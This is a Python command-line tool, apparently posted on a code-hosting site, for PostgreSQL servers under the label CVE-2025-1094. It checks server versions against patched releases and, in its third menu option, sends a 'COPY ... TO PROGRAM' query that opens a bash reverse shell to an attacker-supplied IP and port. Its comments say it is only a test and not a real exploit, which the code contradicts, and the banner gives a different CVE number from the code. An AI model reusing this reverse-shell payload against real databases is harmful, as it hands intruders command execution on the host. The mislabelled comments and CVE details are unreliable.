294 lines
10 KiB
Python
294 lines
10 KiB
Python
#!/usr/bin/env python3
|
|
import sys
|
|
import logging
|
|
import re
|
|
from packaging.version import Version
|
|
from colorama import init, Fore
|
|
import psycopg2
|
|
from psycopg2 import OperationalError
|
|
|
|
# colorama 초기화
|
|
init(autoreset=True)
|
|
|
|
print(r"""
|
|
|
|
██╗ ██╗██╗███████╗██╗ █████╗
|
|
██║ ██╔╝██║██╔════╝██║██╔══██╗
|
|
█████╔╝ ██║███████╗██║███████║
|
|
██╔═██╗ ██║╚════██║██║██╔══██║
|
|
██║ ██╗██║███████║██║██║ ██║
|
|
╚═╝ ╚═╝╚═╝╚══════╝╚═╝╚═╝ ╚═╝
|
|
|
|
Edited by : secKrity - 이민준
|
|
CVE ID : CVE-2025-1095
|
|
Base Score : 8.1 / HIGH
|
|
Affected product : PostgreSQL
|
|
Vulnerable version : • v < 13.19
|
|
• v < 14.16
|
|
• v < 15.11
|
|
• v < 16.7
|
|
• v < 17.3
|
|
""")
|
|
|
|
# 로깅 설정
|
|
logging.basicConfig(
|
|
filename="postgres_diagnostic.log",
|
|
level=logging.INFO,
|
|
format="%(asctime)s - %(levelname)s - %(message)s",
|
|
)
|
|
|
|
# -------------------------
|
|
# 유틸: 로깅 및 출력 헬퍼
|
|
# -------------------------
|
|
def log_event(evt: str, details: str = ""):
|
|
"""로깅 이벤트 기록"""
|
|
logging.info(f"{evt} {details}")
|
|
|
|
def info(msg: str):
|
|
"""정보 메시지 출력 (노란색)"""
|
|
print(Fore.YELLOW + "[*] " + msg)
|
|
|
|
def success(msg: str):
|
|
"""성공 메시지 출력 (초록색)"""
|
|
print(Fore.GREEN + "[+] " + msg)
|
|
|
|
def vuln(msg: str):
|
|
"""취약점 메시지 출력 (빨간색)"""
|
|
print(Fore.RED + "[-] " + msg)
|
|
|
|
def error(msg: str):
|
|
"""오류 메시지 출력 (빨간색)"""
|
|
print(Fore.RED + "[!] " + msg)
|
|
|
|
# -------------------------
|
|
# 구성: CVE-2025-1094 패치 기준 (공식 권고)
|
|
# 영향: PostgreSQL versions *before* 17.3, 16.7, 15.11, 14.16, 13.19 are affected.
|
|
# -------------------------
|
|
PATCHED_MIN_VERSIONS = {
|
|
17: Version("17.3"),
|
|
16: Version("16.7"),
|
|
15: Version("15.11"),
|
|
14: Version("14.16"),
|
|
13: Version("13.19"),
|
|
}
|
|
|
|
# -------------------------
|
|
# 유틸: PostgreSQL 서버 버전 문자열 파싱
|
|
# 예: "PostgreSQL 15.10 (Ubuntu 15.10-1.pgdg22.04+1) ..." -> "15.10"
|
|
# -------------------------
|
|
def parse_pg_version(version_str: str) -> str:
|
|
"""PostgreSQL 버전 문자열에서 X.Y 형태의 버전 추출"""
|
|
if not version_str:
|
|
return ""
|
|
# "PostgreSQL X.Y ..." 형식에서 정규표현식으로 X.Y 추출
|
|
m = re.search(r'(\d+)\.(\d+)', version_str)
|
|
if m:
|
|
return f"{m.group(1)}.{m.group(2)}"
|
|
# fallback: 첫 번째 숫자만 (주 버전만 있는 경우)
|
|
m2 = re.search(r'(\d+)', version_str)
|
|
if m2:
|
|
return f"{m2.group(1)}.0"
|
|
return ""
|
|
|
|
# -------------------------
|
|
# PostgreSQL 접속/쿼리 헬퍼 클래스
|
|
# -------------------------
|
|
class PGDiagnostic:
|
|
"""PostgreSQL 연결 및 진단 쿼리 실행을 위한 헬퍼 클래스"""
|
|
def __init__(self, host: str, port: int, user: str, password: str, dbname: str = "postgres", connect_timeout: int = 5):
|
|
self.conn_params = {
|
|
"host": host,
|
|
"port": port,
|
|
"user": user,
|
|
"password": password,
|
|
"dbname": dbname,
|
|
"connect_timeout": connect_timeout,
|
|
}
|
|
self.conn = None
|
|
|
|
def connect(self) -> bool:
|
|
"""데이터베이스 연결 시도"""
|
|
try:
|
|
self.conn = psycopg2.connect(**self.conn_params)
|
|
log_event("connect_success", f"{self.conn_params['host']}:{self.conn_params['port']}")
|
|
return True
|
|
except OperationalError as e:
|
|
log_event("connect_fail", str(e))
|
|
error(f"Connection failed: {e}")
|
|
return False
|
|
|
|
def close(self):
|
|
"""데이터베이스 연결 종료"""
|
|
if self.conn:
|
|
try:
|
|
self.conn.close()
|
|
except Exception:
|
|
pass
|
|
self.conn = None
|
|
|
|
def fetchone(self, query: str):
|
|
"""단일 행 쿼리 실행 및 결과 반환"""
|
|
if not self.conn:
|
|
raise RuntimeError("Not connected")
|
|
with self.conn.cursor() as cur:
|
|
cur.execute(query)
|
|
return cur.fetchone()
|
|
|
|
def get_server_version_string(self) -> str:
|
|
"""PostgreSQL 서버의 전체 버전 문자열을 가져옴"""
|
|
try:
|
|
row = self.fetchone("SELECT version();")
|
|
if row and row[0]:
|
|
return row[0]
|
|
except Exception as e:
|
|
log_event("version_query_fail", str(e))
|
|
error(f"version() query failed: {e}")
|
|
return ""
|
|
|
|
def get_reverse_shell(self, lhost, lport) -> str:
|
|
"""'COPY TO PROGRAM' 명령을 사용한 리버스 셸 테스트 (실제 익스플로잇 아님)"""
|
|
try:
|
|
# COPY TO PROGRAM을 이용해 리버스 셸 명령어 실행 시도
|
|
self.fetchone(f"COPY users TO PROGRAM 'bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"';")
|
|
# NOTE: 쿼리 자체는 성공하지만, 명령어 실행 성공 여부는 외부에서 확인해야 함.
|
|
except Exception as e:
|
|
# COPY TO PROGRAM을 실행할 권한이 없거나 다른 오류가 발생할 수 있음
|
|
log_event("get_reverse_shell", str(e))
|
|
return ""
|
|
|
|
# -------------------------
|
|
# 진단 로직: CVE 영향 판정
|
|
# -------------------------
|
|
def is_version_vulnerable(ver_str: str) -> (bool, str):
|
|
"""
|
|
버전 문자열(예: '15.10')을 받아 CVE-2025-1094에 취약한지 여부를 반환.
|
|
반환: (취약여부: bool, 이유: str)
|
|
"""
|
|
if not ver_str:
|
|
return (False, "버전 문자열 파싱 실패")
|
|
try:
|
|
v = Version(ver_str)
|
|
except Exception: # InvalidVersion
|
|
return (False, f"버전 파싱 불가: {ver_str}")
|
|
|
|
# 주 버전 추출 (15.10 -> 15)
|
|
try:
|
|
major = int(v.base_version.split('.')[0])
|
|
except:
|
|
return (False, f"주 버전 추출 불가: {ver_str}")
|
|
|
|
if major in PATCHED_MIN_VERSIONS:
|
|
patched = PATCHED_MIN_VERSIONS[major]
|
|
if v < patched:
|
|
return (True, f"{ver_str} < patched {patched}")
|
|
else:
|
|
return (False, f"{ver_str} >= patched {patched}")
|
|
else:
|
|
# major 가 목록에 없으면, 판단 불가(예: 너무 오래되었거나 매우 새로운 major)
|
|
return (False, f"판정 불가: major {major}에 대한 패치 기준 없음")
|
|
|
|
# -------------------------
|
|
# 메뉴 및 실행
|
|
# -------------------------
|
|
def print_menu():
|
|
"""메뉴 출력"""
|
|
print("\n[ Menu ]")
|
|
print("1) Version Check")
|
|
print("2) Vuln Check (CVE-2025-1094)")
|
|
print("3) Exploit with Reverse Shell (TEST)")
|
|
print("4) Exit")
|
|
|
|
def main():
|
|
"""메인 실행 함수"""
|
|
if len(sys.argv) < 5:
|
|
print("Usage: python3 CVE-2025-1094_Tool.py <host> <port> <user> <password> <dbname(optional)>")
|
|
print("Example: python3 CVE-2025-1094_Tool.py 127.0.0.1 5432 postgres mypass mydb")
|
|
sys.exit(1)
|
|
|
|
host = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
user = sys.argv[3]
|
|
password = sys.argv[4]
|
|
# dbname은 5번째 인자, 없으면 "postgres"
|
|
dbname = sys.argv[5] if len(sys.argv) >= 6 else "postgres"
|
|
|
|
pg = PGDiagnostic(host, port, user, password, dbname)
|
|
|
|
info(f"Target: {host}:{port} DB={dbname} User={user}")
|
|
|
|
if not pg.connect():
|
|
error("데이터베이스 연결 실패 — 실행을 종료합니다.")
|
|
return
|
|
|
|
try:
|
|
while True:
|
|
print_menu()
|
|
choice = input(">> ").strip()
|
|
|
|
if choice == "1":
|
|
log_event("menu_choice", "version_check")
|
|
info("Checking Server Version...")
|
|
ver_str_full = pg.get_server_version_string()
|
|
if ver_str_full:
|
|
parsed = parse_pg_version(ver_str_full)
|
|
info(f"Server version string: {ver_str_full}")
|
|
info(f"Parsed version: {parsed}")
|
|
else:
|
|
error("버전 정보를 가져오지 못했습니다.") # warn 대신 error 사용
|
|
|
|
elif choice == "2":
|
|
log_event("menu_choice", "cve_check")
|
|
info("Checking CVE-2025-1094 Vulnerability...")
|
|
ver_str_full = pg.get_server_version_string()
|
|
if not ver_str_full:
|
|
error("버전 정보를 읽을 수 없습니다. 먼저 1) 버전 확인을 해주세요.")
|
|
continue
|
|
|
|
ver = parse_pg_version(ver_str_full)
|
|
vulnerable, reason = is_version_vulnerable(ver)
|
|
info(f"Parsed version: {ver} -> {reason}")
|
|
|
|
if vulnerable:
|
|
vuln(f"!!! {ver} is vulnerable to CVE-2025-1094 !!!")
|
|
else:
|
|
success(f"Not vulnerable (Decision: {reason})")
|
|
|
|
log_event("cve_check_result", f"{ver} vulnerable={vulnerable} reason={reason}")
|
|
|
|
elif choice == "3":
|
|
log_event("menu_choice", "reverse_shell_test")
|
|
info("Starting Reverse Shell Test (using COPY TO PROGRAM)...")
|
|
|
|
# 리버스 셸 테스트는 실제 익스플로잇 코드를 제공하지 않으므로,
|
|
# 사용자로부터 LHOST/LPORT를 입력받아 테스트 쿼리만 전송합니다.
|
|
lhost = input("Attacker IP (LHOST): ")
|
|
lport = input("Attacker PORT (LPORT): ")
|
|
|
|
try:
|
|
lport_int = int(lport)
|
|
info(f"Trying to Send Reverse Shell Command ({lhost}:{lport_int})")
|
|
info(f"Attacker must be running `nc -lvnp {lport_int}` Command")
|
|
|
|
pg.get_reverse_shell(lhost, lport_int)
|
|
|
|
# 쿼리 전송 성공 여부만 확인 가능. 실제 셸 연결 성공 여부는 공격자 측에서 확인.
|
|
vuln("Reverse Shell Query Transmission Attempted. Check Attacker Listener.")
|
|
|
|
except ValueError:
|
|
error("LPORT는 유효한 숫자여야 합니다.")
|
|
except Exception as e:
|
|
error(f"Reverse Shell Test encountered an issue: {e}")
|
|
|
|
elif choice == "4":
|
|
log_event("menu_choice", "exit")
|
|
info("Exiting...")
|
|
break
|
|
else:
|
|
error("Invalid input. Please choose 1, 2, 3, or 4.")
|
|
|
|
finally:
|
|
pg.close()
|
|
|
|
if __name__ == "__main__":
|
|
main()
|